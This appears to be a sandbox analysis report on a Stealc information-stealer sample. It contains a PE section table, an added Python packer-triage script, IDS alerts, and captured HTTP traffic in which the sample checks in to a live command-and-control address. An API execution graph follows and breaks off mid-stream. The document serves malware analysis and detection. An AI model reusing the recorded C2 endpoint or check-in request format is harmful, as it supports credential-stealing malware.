Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(name not rendered; non-printable characters) | 0x1000 | 0x25b000 | 0x22800 | ce336758aeee58d29e8cbd50a4cd7d7d | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(name not rendered; non-printable characters) | 0x25e000 | 0x29b000 | 0x200 | 7f9c0cbc5d28ebb962323fcf823ce965 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tggnfgne | 0x4f9000 | 0x199000 | 0x198800 | d58ed3f9bbf0cb520ae8049da3e3c1c2 | False | 0.9947980416156671 | data | 7.953565165226687 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tktydact | 0x692000 | 0x1000 | 0x400 | 255bc4c04371b01a38fb963094be8e25 | False | 0.7568359375 | data | 6.033272398550917 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x693000 | 0x3000 | 0x2200 | c6f2572ca008f134b05583522c3bcf7e | False | 0.34880514705882354 | DOS executable (COM) | 3.8528935110874127 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Imports
DLL | Import
kernel32.dll | lstrcpy
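The section table and import list above are the profile of a commercial protector rather than a compiler build: two sections whose names the report could not render, five sections that are both writable and executable, a 1.6 MB section at entropy 7.95, virtual sizes far larger than raw sizes, a single import (kernel32!lstrcpy), and an entry point in .taggant, the Taggant section that Oreans' Themida/WinLicense append, consistent with the Oreans.vxd and Software\WinLicense strings in the Anti-VM section. The Python below, added here and not part of the report, encodes those observations as triage heuristics run over the transcribed table. The section values are copied from the report (entropies rounded, "unknown" as None, unrenderable names left empty); the heuristics and thresholds are this example's own assumptions.

```python
"""Packer / protector triage from a PE section table (added example)."""

IMAGE_BASE = 0x400000
ENTRY_POINT = 0xA93000                  # report lists the entry point as a VA; RVA = VA - image base
IMPORTS = {"kernel32.dll": ["lstrcpy"]}
STANDARD_NAMES = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc", ".reloc",
                  ".bss", ".tls", ".pdata", ".CRT", "CODE", "DATA"}


def sec(name, va, vsize, raw, entropy, chars):
    """Build a section record; chars is the report's comma-separated list of IMAGE_SCN_* names."""
    return {"name": name, "va": va, "vsize": vsize, "raw": raw, "entropy": entropy,
            "chars": {c.strip() for c in chars.split(",")}}


RWX = "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE"
RW = "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE"
# Transcribed from the report's section table (entropy rounded; "unknown" -> None; unprintable names -> "").
SECTIONS = [
    sec("",         0x001000, 0x25B000, 0x022800, None,  RWX),
    sec(".rsrc",    0x25C000, 0x001000, 0x000000, 0.0,   RW),
    sec(".idata",   0x25D000, 0x001000, 0x000200, 0.906, RW),
    sec("",         0x25E000, 0x29B000, 0x000200, None,  RWX),
    sec("tggnfgne", 0x4F9000, 0x199000, 0x198800, 7.954, RWX),
    sec("tktydact", 0x692000, 0x001000, 0x000400, 6.033, RWX),
    sec(".taggant", 0x693000, 0x003000, 0x002200, 3.853, RWX),
]


def section_for_rva(rva, sections):
    """Return the section whose in-memory range covers rva, or None."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw"]):
            return s
    return None


def packer_indicators(sections, entry_va, image_base, imports):
    """Return one human-readable reason per packer/protector indicator found (thresholds are assumptions)."""
    reasons = []
    ep = section_for_rva(entry_va - image_base, sections)
    if ep is None:
        reasons.append("entry point lies outside every section")
    elif "IMAGE_SCN_CNT_CODE" not in ep["chars"] or ep["name"] not in STANDARD_NAMES:
        reasons.append(f"entry point in non-standard section {ep['name'] or '<unprintable>'}")
    rwx = [s for s in sections if {"IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_WRITE"} <= s["chars"]]
    if rwx:
        reasons.append(f"{len(rwx)} writable and executable sections")
    # A section that reserves much more memory than it holds on disk is where the payload gets unpacked.
    hollow = [s for s in sections if s["raw"] and s["vsize"] > 8 * s["raw"]]
    if hollow:
        reasons.append(f"{len(hollow)} sections reserve far more memory than they hold on disk")
    dense = [s for s in sections if s["entropy"] is not None and s["entropy"] > 7.0 and s["raw"] >= 0x10000]
    if dense:
        reasons.append(f"{len(dense)} large sections with entropy > 7.0 (compressed or encrypted payload)")
    odd = [s for s in sections if s["name"] not in STANDARD_NAMES]
    if odd:
        reasons.append(f"{len(odd)} sections with non-standard or unprintable names")
    n_imports = sum(len(v) for v in imports.values())
    if n_imports < 5:
        reasons.append(f"only {n_imports} import(s) ({', '.join(sorted(imports))}); the real IAT is resolved at run time")
    return reasons


def triage(sections=SECTIONS, entry_va=ENTRY_POINT, image_base=IMAGE_BASE, imports=IMPORTS):
    """Label plus reasons; three or more indicators is treated as packed/protected (assumption)."""
    reasons = packer_indicators(sections, entry_va, image_base, imports)
    label = "likely packed/protected" if len(reasons) >= 3 else "no strong packer indicators"
    return label, reasons


if __name__ == "__main__":
    label, reasons = triage()
    print(label)
    for r in reasons:
        print(" -", r)
```

Run against the transcribed table this reports six indicators and places the entry point in .taggant, matching the report's own "Entrypoint Section" field; the same function returns no reasons for a plain compiler layout with a code-flagged .text section and a normal import count.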
Suricata IDS alert
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-11T12:44:04.440396+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP
TCP packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 11, 2024 12:44:03.498017073 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 11, 2024 12:44:03.502939939 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Oct 11, 2024 12:44:03.503062963 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 11, 2024 12:44:03.503468990 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 11, 2024 12:44:03.508493900 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Oct 11, 2024 12:44:04.194227934 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Oct 11, 2024 12:44:04.194291115 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 11, 2024 12:44:04.211483002 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 11, 2024 12:44:04.216326952 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Oct 11, 2024 12:44:04.440160036 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Oct 11, 2024 12:44:04.440396070 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 11, 2024 12:44:07.252717018 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
HTTP sessions
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | 3448 | C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Oct 11, 2024 12:44:03.503468990 CEST89OUTGET / HTTP/1.1
                      Host: 185.215.113.37
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Oct 11, 2024 12:44:04.194227934 CEST203INHTTP/1.1 200 OK
                      Date: Fri, 11 Oct 2024 10:44:04 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Oct 11, 2024 12:44:04.211483002 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----HCFCAAEBGCAKKFIDBKJJ
                      Host: 185.215.113.37
                      Content-Length: 211
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 38 38 36 33 33 37 44 33 30 43 33 38 38 36 35 38 32 35 34 38 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 2d 2d 0d 0a
                      Data Ascii:
                      ------HCFCAAEBGCAKKFIDBKJJ
                      Content-Disposition: form-data; name="hwid"

                      D9886337D30C3886582548
                      ------HCFCAAEBGCAKKFIDBKJJ
                      Content-Disposition: form-data; name="build"

                      doma
                      ------HCFCAAEBGCAKKFIDBKJJ--
                      Oct 11, 2024 12:44:04.440160036 CEST  210                IN         HTTP/1.1 200 OK
                      Date: Fri, 11 Oct 2024 10:44:04 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 59 6d 78 76 59 32 73 3d
                      Data Ascii: YmxvY2s=



                      Target ID: 0
                      Start time: 06:43:59
                      Start date: 11/10/2024
                      Path: C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit): true
                      Commandline: "C:\Users\user\Desktop\file.exe"
                      Imagebase: 0x860000
                      File size: 1'829'376 bytes
                      MD5 hash: ADDE8B6DDCD55DE3DDE9F4EE627CC469
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2050826095.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2091709653.000000000114E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      Reputation: low
                      Has exited: true


                        Execution Graph

                        Execution Coverage: 8.2%
                        Dynamic/Decrypted Code Coverage: 0%
                        Signature Coverage: 10.1%
                        Total number of Nodes: 2000
                        Total number of Limit Nodes: 24
87593f StrCmpCA 14672->14673 14674 8751f0 20 API calls 14672->14674 14673->14672 14674->14672 14676 877553 GetVolumeInformationA 14675->14676 14677 87754c 14675->14677 14678 877591 14676->14678 14677->14676 14679 8775fc GetProcessHeap RtlAllocateHeap 14678->14679 14680 877619 14679->14680 14681 877628 wsprintfA 14679->14681 14682 87a740 lstrcpy 14680->14682 14683 87a740 lstrcpy 14681->14683 14684 875da7 14682->14684 14683->14684 14684->13748 14686 87a7a0 lstrcpy 14685->14686 14687 864899 14686->14687 15737 8647b0 14687->15737 14689 8648a5 14690 87a740 lstrcpy 14689->14690 14691 8648d7 14690->14691 14692 87a740 lstrcpy 14691->14692 14693 8648e4 14692->14693 14694 87a740 lstrcpy 14693->14694 14695 8648f1 14694->14695 14696 87a740 lstrcpy 14695->14696 14697 8648fe 14696->14697 14698 87a740 lstrcpy 14697->14698 14699 86490b InternetOpenA StrCmpCA 14698->14699 14700 864944 14699->14700 14701 864ecb InternetCloseHandle 14700->14701 15743 878b60 14700->15743 14703 864ee8 14701->14703 15758 869ac0 CryptStringToBinaryA 14703->15758 14704 864963 15751 87a920 14704->15751 14707 864976 14709 87a8a0 lstrcpy 14707->14709 14714 86497f 14709->14714 14710 87a820 2 API calls 14711 864f05 14710->14711 14713 87a9b0 4 API calls 14711->14713 14712 864f27 codecvt 14716 87a7a0 lstrcpy 14712->14716 14715 864f1b 14713->14715 14718 87a9b0 4 API calls 14714->14718 14717 87a8a0 lstrcpy 14715->14717 14729 864f57 14716->14729 14717->14712 14719 8649a9 14718->14719 14720 87a8a0 lstrcpy 14719->14720 14721 8649b2 14720->14721 14722 87a9b0 4 API calls 14721->14722 14723 8649d1 14722->14723 14724 87a8a0 lstrcpy 14723->14724 14725 8649da 14724->14725 14726 87a920 3 API calls 14725->14726 14727 8649f8 14726->14727 14728 87a8a0 lstrcpy 14727->14728 14730 864a01 14728->14730 14729->13751 14731 87a9b0 4 API calls 14730->14731 14732 864a20 14731->14732 14733 87a8a0 lstrcpy 14732->14733 14734 864a29 14733->14734 14735 87a9b0 4 API calls 14734->14735 14736 864a48 14735->14736 14737 87a8a0 lstrcpy 
14736->14737 14738 864a51 14737->14738 14739 87a9b0 4 API calls 14738->14739 14740 864a7d 14739->14740 14741 87a920 3 API calls 14740->14741 14742 864a84 14741->14742 14743 87a8a0 lstrcpy 14742->14743 14744 864a8d 14743->14744 14745 864aa3 InternetConnectA 14744->14745 14745->14701 14746 864ad3 HttpOpenRequestA 14745->14746 14748 864ebe InternetCloseHandle 14746->14748 14749 864b28 14746->14749 14748->14701 14750 87a9b0 4 API calls 14749->14750 14751 864b3c 14750->14751 14752 87a8a0 lstrcpy 14751->14752 14753 864b45 14752->14753 14754 87a920 3 API calls 14753->14754 14755 864b63 14754->14755 14756 87a8a0 lstrcpy 14755->14756 14757 864b6c 14756->14757 14758 87a9b0 4 API calls 14757->14758 14759 864b8b 14758->14759 14760 87a8a0 lstrcpy 14759->14760 14761 864b94 14760->14761 14762 87a9b0 4 API calls 14761->14762 14763 864bb5 14762->14763 14764 87a8a0 lstrcpy 14763->14764 14765 864bbe 14764->14765 14766 87a9b0 4 API calls 14765->14766 14767 864bde 14766->14767 14768 87a8a0 lstrcpy 14767->14768 14769 864be7 14768->14769 14770 87a9b0 4 API calls 14769->14770 14771 864c06 14770->14771 14772 87a8a0 lstrcpy 14771->14772 14773 864c0f 14772->14773 14774 87a920 3 API calls 14773->14774 14775 864c2d 14774->14775 14776 87a8a0 lstrcpy 14775->14776 14777 864c36 14776->14777 14778 87a9b0 4 API calls 14777->14778 14779 864c55 14778->14779 14780 87a8a0 lstrcpy 14779->14780 14781 864c5e 14780->14781 14782 87a9b0 4 API calls 14781->14782 14783 864c7d 14782->14783 14784 87a8a0 lstrcpy 14783->14784 14785 864c86 14784->14785 14786 87a920 3 API calls 14785->14786 14787 864ca4 14786->14787 14788 87a8a0 lstrcpy 14787->14788 14789 864cad 14788->14789 14790 87a9b0 4 API calls 14789->14790 14791 864ccc 14790->14791 14792 87a8a0 lstrcpy 14791->14792 14793 864cd5 14792->14793 14794 87a9b0 4 API calls 14793->14794 14795 864cf6 14794->14795 14796 87a8a0 lstrcpy 14795->14796 14797 864cff 14796->14797 14798 87a9b0 4 API calls 14797->14798 14799 864d1f 14798->14799 14800 87a8a0 lstrcpy 14799->14800 
14801 864d28 14800->14801 14802 87a9b0 4 API calls 14801->14802 14803 864d47 14802->14803 14804 87a8a0 lstrcpy 14803->14804 14805 864d50 14804->14805 14806 87a920 3 API calls 14805->14806 14807 864d6e 14806->14807 14808 87a8a0 lstrcpy 14807->14808 14809 864d77 14808->14809 14810 87a740 lstrcpy 14809->14810 14811 864d92 14810->14811 14812 87a920 3 API calls 14811->14812 14813 864db3 14812->14813 14814 87a920 3 API calls 14813->14814 14815 864dba 14814->14815 14816 87a8a0 lstrcpy 14815->14816 14817 864dc6 14816->14817 14818 864de7 lstrlen 14817->14818 14819 864dfa 14818->14819 14820 864e03 lstrlen 14819->14820 15757 87aad0 14820->15757 14822 864e13 HttpSendRequestA 14823 864e32 InternetReadFile 14822->14823 14824 864e67 InternetCloseHandle 14823->14824 14829 864e5e 14823->14829 14826 87a800 14824->14826 14826->14748 14827 87a9b0 4 API calls 14827->14829 14828 87a8a0 lstrcpy 14828->14829 14829->14823 14829->14824 14829->14827 14829->14828 15764 87aad0 14830->15764 14832 8717c4 StrCmpCA 14833 8717d7 14832->14833 14834 8717cf ExitProcess 14832->14834 14835 8719c2 14833->14835 14836 8718cf StrCmpCA 14833->14836 14837 8718ad StrCmpCA 14833->14837 14838 871913 StrCmpCA 14833->14838 14839 871932 StrCmpCA 14833->14839 14840 8718f1 StrCmpCA 14833->14840 14841 871951 StrCmpCA 14833->14841 14842 871970 StrCmpCA 14833->14842 14843 87187f StrCmpCA 14833->14843 14844 87185d StrCmpCA 14833->14844 14845 87a820 lstrlen lstrcpy 14833->14845 14835->13753 14836->14833 14837->14833 14838->14833 14839->14833 14840->14833 14841->14833 14842->14833 14843->14833 14844->14833 14845->14833 14847 87a7a0 lstrcpy 14846->14847 14848 865979 14847->14848 14849 8647b0 2 API calls 14848->14849 14850 865985 14849->14850 14851 87a740 lstrcpy 14850->14851 14852 8659ba 14851->14852 14853 87a740 lstrcpy 14852->14853 14854 8659c7 14853->14854 14855 87a740 lstrcpy 14854->14855 14856 8659d4 14855->14856 14857 87a740 lstrcpy 14856->14857 14858 8659e1 14857->14858 14859 87a740 lstrcpy 14858->14859 14860 8659ee 
InternetOpenA StrCmpCA 14859->14860 14861 865a1d 14860->14861 14862 865fc3 InternetCloseHandle 14861->14862 14864 878b60 3 API calls 14861->14864 14863 865fe0 14862->14863 14866 869ac0 4 API calls 14863->14866 14865 865a3c 14864->14865 14867 87a920 3 API calls 14865->14867 14868 865fe6 14866->14868 14869 865a4f 14867->14869 14871 87a820 2 API calls 14868->14871 14874 86601f codecvt 14868->14874 14870 87a8a0 lstrcpy 14869->14870 14875 865a58 14870->14875 14872 865ffd 14871->14872 14873 87a9b0 4 API calls 14872->14873 14876 866013 14873->14876 14877 87a7a0 lstrcpy 14874->14877 14879 87a9b0 4 API calls 14875->14879 14878 87a8a0 lstrcpy 14876->14878 14888 86604f 14877->14888 14878->14874 14880 865a82 14879->14880 14881 87a8a0 lstrcpy 14880->14881 14882 865a8b 14881->14882 14883 87a9b0 4 API calls 14882->14883 14884 865aaa 14883->14884 14885 87a8a0 lstrcpy 14884->14885 14886 865ab3 14885->14886 14887 87a920 3 API calls 14886->14887 14889 865ad1 14887->14889 14888->13759 14890 87a8a0 lstrcpy 14889->14890 14891 865ada 14890->14891 14892 87a9b0 4 API calls 14891->14892 14893 865af9 14892->14893 14894 87a8a0 lstrcpy 14893->14894 14895 865b02 14894->14895 14896 87a9b0 4 API calls 14895->14896 14897 865b21 14896->14897 14898 87a8a0 lstrcpy 14897->14898 14899 865b2a 14898->14899 14900 87a9b0 4 API calls 14899->14900 14901 865b56 14900->14901 14902 87a920 3 API calls 14901->14902 14903 865b5d 14902->14903 14904 87a8a0 lstrcpy 14903->14904 14905 865b66 14904->14905 14906 865b7c InternetConnectA 14905->14906 14906->14862 14907 865bac HttpOpenRequestA 14906->14907 14909 865fb6 InternetCloseHandle 14907->14909 14910 865c0b 14907->14910 14909->14862 14911 87a9b0 4 API calls 14910->14911 14912 865c1f 14911->14912 14913 87a8a0 lstrcpy 14912->14913 14914 865c28 14913->14914 14915 87a920 3 API calls 14914->14915 14916 865c46 14915->14916 14917 87a8a0 lstrcpy 14916->14917 14918 865c4f 14917->14918 14919 87a9b0 4 API calls 14918->14919 14920 865c6e 14919->14920 14921 87a8a0 lstrcpy 
14920->14921 14922 865c77 14921->14922 14923 87a9b0 4 API calls 14922->14923 14924 865c98 14923->14924 14925 87a8a0 lstrcpy 14924->14925 14926 865ca1 14925->14926 14927 87a9b0 4 API calls 14926->14927 14928 865cc1 14927->14928 14929 87a8a0 lstrcpy 14928->14929 14930 865cca 14929->14930 14931 87a9b0 4 API calls 14930->14931 14932 865ce9 14931->14932 14933 87a8a0 lstrcpy 14932->14933 14934 865cf2 14933->14934 14935 87a920 3 API calls 14934->14935 14936 865d10 14935->14936 14937 87a8a0 lstrcpy 14936->14937 14938 865d19 14937->14938 14939 87a9b0 4 API calls 14938->14939 14940 865d38 14939->14940 14941 87a8a0 lstrcpy 14940->14941 14942 865d41 14941->14942 14943 87a9b0 4 API calls 14942->14943 14944 865d60 14943->14944 14945 87a8a0 lstrcpy 14944->14945 14946 865d69 14945->14946 14947 87a920 3 API calls 14946->14947 14948 865d87 14947->14948 14949 87a8a0 lstrcpy 14948->14949 14950 865d90 14949->14950 14951 87a9b0 4 API calls 14950->14951 14952 865daf 14951->14952 14953 87a8a0 lstrcpy 14952->14953 14954 865db8 14953->14954 14955 87a9b0 4 API calls 14954->14955 14956 865dd9 14955->14956 14957 87a8a0 lstrcpy 14956->14957 14958 865de2 14957->14958 14959 87a9b0 4 API calls 14958->14959 14960 865e02 14959->14960 14961 87a8a0 lstrcpy 14960->14961 14962 865e0b 14961->14962 14963 87a9b0 4 API calls 14962->14963 14964 865e2a 14963->14964 14965 87a8a0 lstrcpy 14964->14965 14966 865e33 14965->14966 14967 87a920 3 API calls 14966->14967 14968 865e54 14967->14968 14969 87a8a0 lstrcpy 14968->14969 14970 865e5d 14969->14970 14971 865e70 lstrlen 14970->14971 15765 87aad0 14971->15765 14973 865e81 lstrlen GetProcessHeap RtlAllocateHeap 15766 87aad0 14973->15766 14975 865eae lstrlen 14976 865ebe 14975->14976 14977 865ed7 lstrlen 14976->14977 14978 865ee7 14977->14978 14979 865ef0 lstrlen 14978->14979 14980 865f04 14979->14980 14981 865f1a lstrlen 14980->14981 15767 87aad0 14981->15767 14983 865f2a HttpSendRequestA 14984 865f35 InternetReadFile 14983->14984 14985 865f6a InternetCloseHandle 
14984->14985 14989 865f61 14984->14989 14985->14909 14987 87a9b0 4 API calls 14987->14989 14988 87a8a0 lstrcpy 14988->14989 14989->14984 14989->14985 14989->14987 14989->14988 14992 871077 14990->14992 14991 871151 14991->13761 14992->14991 14993 87a820 lstrlen lstrcpy 14992->14993 14993->14992 14999 870db7 14994->14999 14995 870f17 14995->13769 14996 870e27 StrCmpCA 14996->14999 14997 870e67 StrCmpCA 14997->14999 14998 870ea4 StrCmpCA 14998->14999 14999->14995 14999->14996 14999->14997 14999->14998 15000 87a820 lstrlen lstrcpy 14999->15000 15000->14999 15004 870f67 15001->15004 15002 871044 15002->13777 15003 870fb2 StrCmpCA 15003->15004 15004->15002 15004->15003 15005 87a820 lstrlen lstrcpy 15004->15005 15005->15004 15007 87a740 lstrcpy 15006->15007 15008 871a26 15007->15008 15009 87a9b0 4 API calls 15008->15009 15010 871a37 15009->15010 15011 87a8a0 lstrcpy 15010->15011 15012 871a40 15011->15012 15013 87a9b0 4 API calls 15012->15013 15014 871a5b 15013->15014 15015 87a8a0 lstrcpy 15014->15015 15016 871a64 15015->15016 15017 87a9b0 4 API calls 15016->15017 15018 871a7d 15017->15018 15019 87a8a0 lstrcpy 15018->15019 15020 871a86 15019->15020 15021 87a9b0 4 API calls 15020->15021 15022 871aa1 15021->15022 15023 87a8a0 lstrcpy 15022->15023 15024 871aaa 15023->15024 15025 87a9b0 4 API calls 15024->15025 15026 871ac3 15025->15026 15027 87a8a0 lstrcpy 15026->15027 15028 871acc 15027->15028 15029 87a9b0 4 API calls 15028->15029 15030 871ae7 15029->15030 15031 87a8a0 lstrcpy 15030->15031 15032 871af0 15031->15032 15033 87a9b0 4 API calls 15032->15033 15034 871b09 15033->15034 15035 87a8a0 lstrcpy 15034->15035 15036 871b12 15035->15036 15037 87a9b0 4 API calls 15036->15037 15038 871b2d 15037->15038 15039 87a8a0 lstrcpy 15038->15039 15040 871b36 15039->15040 15041 87a9b0 4 API calls 15040->15041 15042 871b4f 15041->15042 15043 87a8a0 lstrcpy 15042->15043 15044 871b58 15043->15044 15045 87a9b0 4 API calls 15044->15045 15046 871b76 15045->15046 15047 87a8a0 lstrcpy 
15046->15047 15048 871b7f 15047->15048 15049 877500 6 API calls 15048->15049 15050 871b96 15049->15050 15051 87a920 3 API calls 15050->15051 15052 871ba9 15051->15052 15053 87a8a0 lstrcpy 15052->15053 15054 871bb2 15053->15054 15055 87a9b0 4 API calls 15054->15055 15056 871bdc 15055->15056 15057 87a8a0 lstrcpy 15056->15057 15058 871be5 15057->15058 15059 87a9b0 4 API calls 15058->15059 15060 871c05 15059->15060 15061 87a8a0 lstrcpy 15060->15061 15062 871c0e 15061->15062 15768 877690 GetProcessHeap RtlAllocateHeap 15062->15768 15065 87a9b0 4 API calls 15066 871c2e 15065->15066 15067 87a8a0 lstrcpy 15066->15067 15068 871c37 15067->15068 15069 87a9b0 4 API calls 15068->15069 15070 871c56 15069->15070 15071 87a8a0 lstrcpy 15070->15071 15072 871c5f 15071->15072 15073 87a9b0 4 API calls 15072->15073 15074 871c80 15073->15074 15075 87a8a0 lstrcpy 15074->15075 15076 871c89 15075->15076 15775 8777c0 GetCurrentProcess IsWow64Process 15076->15775 15079 87a9b0 4 API calls 15080 871ca9 15079->15080 15081 87a8a0 lstrcpy 15080->15081 15082 871cb2 15081->15082 15083 87a9b0 4 API calls 15082->15083 15084 871cd1 15083->15084 15085 87a8a0 lstrcpy 15084->15085 15086 871cda 15085->15086 15087 87a9b0 4 API calls 15086->15087 15088 871cfb 15087->15088 15089 87a8a0 lstrcpy 15088->15089 15090 871d04 15089->15090 15091 877850 3 API calls 15090->15091 15092 871d14 15091->15092 15093 87a9b0 4 API calls 15092->15093 15094 871d24 15093->15094 15095 87a8a0 lstrcpy 15094->15095 15096 871d2d 15095->15096 15097 87a9b0 4 API calls 15096->15097 15098 871d4c 15097->15098 15099 87a8a0 lstrcpy 15098->15099 15100 871d55 15099->15100 15101 87a9b0 4 API calls 15100->15101 15102 871d75 15101->15102 15103 87a8a0 lstrcpy 15102->15103 15104 871d7e 15103->15104 15105 8778e0 3 API calls 15104->15105 15106 871d8e 15105->15106 15107 87a9b0 4 API calls 15106->15107 15108 871d9e 15107->15108 15109 87a8a0 lstrcpy 15108->15109 15110 871da7 15109->15110 15111 87a9b0 4 API calls 15110->15111 15112 871dc6 15111->15112 
15113 87a8a0 lstrcpy 15112->15113 15114 871dcf 15113->15114 15115 87a9b0 4 API calls 15114->15115 15116 871df0 15115->15116 15117 87a8a0 lstrcpy 15116->15117 15118 871df9 15117->15118 15777 877980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15118->15777 15121 87a9b0 4 API calls 15122 871e19 15121->15122 15123 87a8a0 lstrcpy 15122->15123 15124 871e22 15123->15124 15125 87a9b0 4 API calls 15124->15125 15126 871e41 15125->15126 15127 87a8a0 lstrcpy 15126->15127 15128 871e4a 15127->15128 15129 87a9b0 4 API calls 15128->15129 15130 871e6b 15129->15130 15131 87a8a0 lstrcpy 15130->15131 15132 871e74 15131->15132 15779 877a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15132->15779 15135 87a9b0 4 API calls 15136 871e94 15135->15136 15137 87a8a0 lstrcpy 15136->15137 15138 871e9d 15137->15138 15139 87a9b0 4 API calls 15138->15139 15140 871ebc 15139->15140 15141 87a8a0 lstrcpy 15140->15141 15142 871ec5 15141->15142 15143 87a9b0 4 API calls 15142->15143 15144 871ee5 15143->15144 15145 87a8a0 lstrcpy 15144->15145 15146 871eee 15145->15146 15782 877b00 GetUserDefaultLocaleName 15146->15782 15149 87a9b0 4 API calls 15150 871f0e 15149->15150 15151 87a8a0 lstrcpy 15150->15151 15152 871f17 15151->15152 15153 87a9b0 4 API calls 15152->15153 15154 871f36 15153->15154 15155 87a8a0 lstrcpy 15154->15155 15156 871f3f 15155->15156 15157 87a9b0 4 API calls 15156->15157 15158 871f60 15157->15158 15159 87a8a0 lstrcpy 15158->15159 15160 871f69 15159->15160 15786 877b90 15160->15786 15162 871f80 15163 87a920 3 API calls 15162->15163 15164 871f93 15163->15164 15165 87a8a0 lstrcpy 15164->15165 15166 871f9c 15165->15166 15167 87a9b0 4 API calls 15166->15167 15168 871fc6 15167->15168 15169 87a8a0 lstrcpy 15168->15169 15170 871fcf 15169->15170 15171 87a9b0 4 API calls 15170->15171 15172 871fef 15171->15172 15173 87a8a0 lstrcpy 15172->15173 15174 871ff8 15173->15174 15798 877d80 GetSystemPowerStatus 15174->15798 15177 87a9b0 4 API calls 15178 872018 15177->15178 15179 87a8a0 
